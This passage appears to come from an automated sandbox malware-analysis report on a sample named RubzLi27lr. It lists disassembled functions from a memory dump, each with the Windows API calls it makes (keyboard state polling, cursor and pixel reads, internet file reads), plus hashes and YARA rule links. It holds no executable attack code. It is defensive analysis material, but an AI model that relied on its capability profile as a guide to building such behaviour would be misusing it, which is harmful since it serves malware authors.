                                                                                                                  • API String ID: 3688381893-0
                                                                                                                  • Opcode ID: 68721b652190dc860e7d05aca8115457ca604720e49e612cfe472d60f35c434b
                                                                                                                  • Instruction ID: e7252b4c071ad75085fd5085cf9864c53dcb3c337a02f96f83581c2357d87ccf
                                                                                                                  • Opcode Fuzzy Hash: 68721b652190dc860e7d05aca8115457ca604720e49e612cfe472d60f35c434b
                                                                                                                  • Instruction Fuzzy Hash: 0941B335A04104AFD724CF68CC95FA97BE5EB0B350F1502A8F895A72E2C771AF41EA41
                                                                                                                  Function 00AE2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: e9f02c006c75732142b6dd88c7b040afceffed1783e0bcce27bba60b1e734218
                                                                                                                  • Instruction ID: faafe580994150cdc59fde5b36e692fe9ccd66ff44dd03a38db2efc08c63444d
                                                                                                                  • Opcode Fuzzy Hash: e9f02c006c75732142b6dd88c7b040afceffed1783e0bcce27bba60b1e734218
                                                                                                                  • Instruction Fuzzy Hash: C141D232A002449FCB24DF79C981B5DB7B9EF89314F15456DE515EB392DA31AE01CB80
                                                                                                                  Function 00AC912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00AC9141
                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00AC915E
                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00AC9183
                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00AC919D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4210589936-0
                                                                                                                  • Opcode ID: aa6141782fba79caaad61fb6afb8b150ba27fa2e3df25130646b2037769fea11
                                                                                                                  • Instruction ID: 0456e9656025a730c14e12f7756c42590fc34c75fed46584f337eaa001ab3764
                                                                                                                  • Opcode Fuzzy Hash: aa6141782fba79caaad61fb6afb8b150ba27fa2e3df25130646b2037769fea11
                                                                                                                  • Instruction Fuzzy Hash: 27416031A0850AFBDF559F64C849BEEFBB4FB05320F258359E429A72D0CB306A50DB91
                                                                                                                  Function 00B23874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetInputState.USER32 ref: 00B238CB
                                                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B23922
                                                                                                                  • TranslateMessage.USER32(?), ref: 00B2394B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00B23955
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B23966
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2256411358-0
                                                                                                                  • Opcode ID: 46c42f4189da5e91f8c2e8a4f76d3b9a96d615772be63a86501d26ffb6f5b41e
                                                                                                                  • Instruction ID: 2c94995762687137eb3635c898285967d2fa23a8e96073b0d808e619850955c8
                                                                                                                  • Opcode Fuzzy Hash: 46c42f4189da5e91f8c2e8a4f76d3b9a96d615772be63a86501d26ffb6f5b41e
                                                                                                                  • Instruction Fuzzy Hash: 9A31B9705053619EEB35CB34E849BB63BE8EB16B04F04099DE45BC71A0DBBC9AC5CB21
                                                                                                                  Function 00B2CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CF38
                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00B2CF6F
                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFB4
                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFC8
                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B2C21E,00000000), ref: 00B2CFF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3191363074-0
                                                                                                                  • Opcode ID: 1639b85d58b633ad272352436e588362b1f1335454abfd36061dde606de3b953
                                                                                                                  • Instruction ID: 60bdac37ab36d7b65656e288a0ec005c4afff68bea82b5d15a7060ce42e6e70e
                                                                                                                  • Opcode Fuzzy Hash: 1639b85d58b633ad272352436e588362b1f1335454abfd36061dde606de3b953
                                                                                                                  • Instruction Fuzzy Hash: 28319C71500215EFDB20DFA5EA84AAFBFF9FB14350B1040AEF10AD3140DB30AE489B60
                                                                                                                  Function 00B11901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B11915
                                                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B119C1
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00B119C9
                                                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B119DA
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B119E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3382505437-0
                                                                                                                  • Opcode ID: 83004992f4533685b108cae9dca59578f67e71c8e6d768ad52c98ba84d402099
                                                                                                                  • Instruction ID: 4fe1c136702f7a26bfe819a8b69eb77799205cf1c28c97df7dbb8e8ad16c4f1e
                                                                                                                  • Opcode Fuzzy Hash: 83004992f4533685b108cae9dca59578f67e71c8e6d768ad52c98ba84d402099
                                                                                                                  • Instruction Fuzzy Hash: 8F31E071A00219EFCB00CFACCD98ADE3BB5FB05314F108669FA21A72D0C7709A85CB90
                                                                                                                  Function 00B45706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B45745
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B4579D
                                                                                                                  • _wcslen.LIBCMT ref: 00B457AF
                                                                                                                  • _wcslen.LIBCMT ref: 00B457BA
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B45816
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 763830540-0
                                                                                                                  • Opcode ID: e11d3d05fba968b1bd4d0184dac6b7170dbc132b6983347aeaef036753ad0e20
                                                                                                                  • Instruction ID: 48cef18e73fb54087a3784c8c692adef9e87ac6fbc98966a10d30e40a20dc0e5
                                                                                                                  • Opcode Fuzzy Hash: e11d3d05fba968b1bd4d0184dac6b7170dbc132b6983347aeaef036753ad0e20
                                                                                                                  • Instruction Fuzzy Hash: 2721C370904A189BDB308F60CC85AED7BF8FF04720F108296E929EB281D7708B85DF50
                                                                                                                  Function 00B30930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00B30951
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B30968
                                                                                                                  • GetDC.USER32(00000000), ref: 00B309A4
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00B309B0
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00B309E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4156661090-0
                                                                                                                  • Opcode ID: 0a9cc509d960ffb3c9c3dc6bcf29da17bdb05f93ad54f4cb3dcc01e8afed8fea
                                                                                                                  • Instruction ID: 42a8a7eb13135f10b347a1297e5bd9616e5f81d7ec7ed3db4023a67d67773402
                                                                                                                  • Opcode Fuzzy Hash: 0a9cc509d960ffb3c9c3dc6bcf29da17bdb05f93ad54f4cb3dcc01e8afed8fea
                                                                                                                  • Instruction Fuzzy Hash: 7721A139600214AFD714EF69D984AAEBBF9FF45710F1485A8F84A97362CB70AD04CB50
                                                                                                                  Function 00AECDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00AECDC6
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AECDE9
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AECE0F
                                                                                                                  • _free.LIBCMT ref: 00AECE22
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AECE31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 336800556-0
                                                                                                                  • Opcode ID: 8bc3faf5249896fa04b58f010253a707cbc8ff9d0d8f2a757cb63670fb31e42e
                                                                                                                  • Instruction ID: 087eb7f2085af075acc93d16ce5f540275b6ad04cad8f8370a5c08559d8179d4
                                                                                                                  • Opcode Fuzzy Hash: 8bc3faf5249896fa04b58f010253a707cbc8ff9d0d8f2a757cb63670fb31e42e
                                                                                                                  • Instruction Fuzzy Hash: 3301DF726022957FA3211BBB6C8CD7B6E6DEEC7FB13150129F905D7201EE618E0282B0
                                                                                                                  Function 00AC9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00AC96A2
                                                                                                                  • BeginPath.GDI32(?), ref: 00AC96B9
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00AC96E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225163088-0
                                                                                                                  • Opcode ID: de1568980f85de728d78b6abc3f5bd0ebf6667dd5fec873b355a374b880b05eb
                                                                                                                  • Instruction ID: 8f68706deb1d2ddb4620f676407414e073f598286ce15409fcf0a5f2f8f42f0a
                                                                                                                  • Opcode Fuzzy Hash: de1568980f85de728d78b6abc3f5bd0ebf6667dd5fec873b355a374b880b05eb
                                                                                                                  • Instruction Fuzzy Hash: A3215E30803305EFDB119F68EC18BAA7BB8BB51755F114A5AF410A71F0DB709993CBA4
                                                                                                                  Function 00B15711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2931989736-0
                                                                                                                  • Opcode ID: bb1e37b5c7b8cf91fd37378e397ef4e49979121b435bc8e6b7e8fb6767ce521c
                                                                                                                  • Instruction ID: 649b9c0d619820deb6f315f5567f48a4d47cd255de36409ac6b298df5f90a44f
                                                                                                                  • Opcode Fuzzy Hash: bb1e37b5c7b8cf91fd37378e397ef4e49979121b435bc8e6b7e8fb6767ce521c
                                                                                                                  • Instruction Fuzzy Hash: 71019675741605FAD26855109E83FFA73ECDBA13A4B804061FD059F282F660EE5096A0
                                                                                                                  Function 00AE2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6), ref: 00AE2DFD
                                                                                                                  • _free.LIBCMT ref: 00AE2E32
                                                                                                                  • _free.LIBCMT ref: 00AE2E59
                                                                                                                  • SetLastError.KERNEL32(00000000,00AB1129), ref: 00AE2E66
                                                                                                                  • SetLastError.KERNEL32(00000000,00AB1129), ref: 00AE2E6F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170660625-0
                                                                                                                  • Opcode ID: bb6fc5e427c33dd79167edcdced03c39cc389b3420fc96803e6d0b72a2519d95
                                                                                                                  • Instruction ID: 8491ff2b85323dc0012f43236a01f1664e1338f42b2fd2b3ae0dfe3814e25b32
                                                                                                                  • Opcode Fuzzy Hash: bb6fc5e427c33dd79167edcdced03c39cc389b3420fc96803e6d0b72a2519d95
                                                                                                                  • Instruction Fuzzy Hash: E60128362066906BC61227776D4AF2B2E7DABD27B5F354038F865A32E3EF348C014320
                                                                                                                  Function 00B1000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?,?,00B1035E), ref: 00B1002B
                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10046
                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10054
                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?), ref: 00B10064
                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10070
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3897988419-0
                                                                                                                  • Opcode ID: ea70182a6e8b37cbc016bd912902d2a266516487bbe6e627590b0c7804c2d6fc
                                                                                                                  • Instruction ID: 5f84264d0dea060bab6ccaf75408e0467348eba93a3fc9b814c23cff212fcc51
                                                                                                                  • Opcode Fuzzy Hash: ea70182a6e8b37cbc016bd912902d2a266516487bbe6e627590b0c7804c2d6fc
                                                                                                                  • Instruction Fuzzy Hash: 89018F7A611218BFDB515F68DC48BEA7FEDEB48B91F144164F905D3210EBB1DE808BA0
                                                                                                                  Function 00B1E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B1E997
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 00B1E9A5
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00B1E9AD
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B1E9B7
                                                                                                                  • Sleep.KERNEL32 ref: 00B1E9F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2833360925-0
                                                                                                                  • Opcode ID: b24c9adb896dc8d9bb96df5583f07de14e943fae991a7716248a1b80841f56fb
                                                                                                                  • Instruction ID: f1cdeabddba03b76130102e768b1b8c9604eb81b178e9c89746fbd27f24a3638
                                                                                                                  • Opcode Fuzzy Hash: b24c9adb896dc8d9bb96df5583f07de14e943fae991a7716248a1b80841f56fb
                                                                                                                  • Instruction Fuzzy Hash: 26015B35C0252DDBCF409BE4D849AEDBFB8FB09B00F400586E912B2140DF309690C761
                                                                                                                  Function 00B110F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
